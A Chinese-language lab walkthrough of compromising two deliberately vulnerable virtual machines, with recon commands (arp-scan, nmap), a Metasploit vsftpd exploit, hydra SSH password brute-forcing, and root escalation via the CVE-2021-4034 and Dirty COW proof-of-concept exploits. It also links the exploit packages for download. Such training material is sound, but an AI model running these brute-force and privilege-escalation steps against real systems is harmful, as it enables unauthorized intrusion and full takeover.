环境搭建
kali:
metasploitable2:10.10.10.139 下载链接:https://pan.baidu.com/s/14iPfB0EnG-orRIPvvN4vxg?pwd=babt
Ubuntu Server:10.10.10.135 下载链接:https://pan.baidu.com/s/13w8O8A8c79ubCN2BC3RrBQ?pwd=gatw
让kali与两个靶机用同一张网卡
一、metasploitable2渗透
arp-scan -l
# 用于扫描一个网络中的ARP(地址解析协议)表。ARP表是一个映射表,用于将IP地址转换为MAC地址。
# 通过使用arp-scan -l命令,可以列出网络中所有设备的ARP表项
得到metasploitable2靶机IP:10.10.10.139
nmap -sV -O 10.10.10.139
# -sV:这个参数用于启用版本检测扫描。Nmap将尝试确定目标主机上开放端口的服务版本信息。
# -O:这个参数用于启用操作系统检测。Nmap将尝试确定目标主机的操作系统类型。
发现21端口开放
msfconsol #开启msf
search #找到关于vsftpd漏洞模块
也可以用445端口的samba漏洞
use 1 #使用模块1
set rhosts 10.10.10.139 #设置靶机IP
run # 开始攻击
直接获得root
二、Ubuntu Server渗透
需要用到的poc:链接:https://pan.baidu.com/s/1iiOGAWlsk2DP7Bgp0Nfhdg?pwd=pock
先获取靶机ip
发现靶机开放22端口,可以使用爆破获取登录用户和密码
hydra -L e.txt -P passwd.txt 10.10.10.135 ssh -f
# -L 指定用户名字典
# -P 指定密码字典
# -f 表示在破解过程中使用fork模式。这意味着Hydra会同时尝试多个用户名和密码组合
ssh -p 22 codingteam@10.10.10.135 #远程登录到靶机
uname -r #显示操作系统的发行版号。
这里我换成MobaXterm_Personal_12.4远程到靶机
上传Linux-Exploit-Suggester.sh(liunx辅助提权脚本)到靶机
mv Linux-Exploit-Suggester.sh lse.sh #把脚本重命名为lse.sh
我们将用到CVE-2016-5195和CVE-2021-4034
CVE-2021-4034-main利用
将下载好的文件上传到靶机
cd cve-2021-4034-main #进入文件目录
gcc cve-2021-4034-poc -o exp
#用GCC编译器编译一个叫做cve-2021-4034-poc的POC(Proof of Concept,概念证明)
# -o exp 命名为exp
./exp #运行poc代码
发现已经获取root权限
CVE-2016-5195-master
进入codingteam用户具有可执行的目录:home或者tmp
可以使用ls -al 查看对目录所有的权限
将CVE-2016-5195-master上传到拥有可执行的目录下
pwd #查看当前路径
mv CVE-2016-5195-master CVE #将文件重名为CVE
cd CVE #进入文件目录
make #编译
./dcow #运行提权脚本
它会给出一个密码,复制后输入su提权
可以发现我们已经是root了
-=============================================-
有不足之处,请各位指出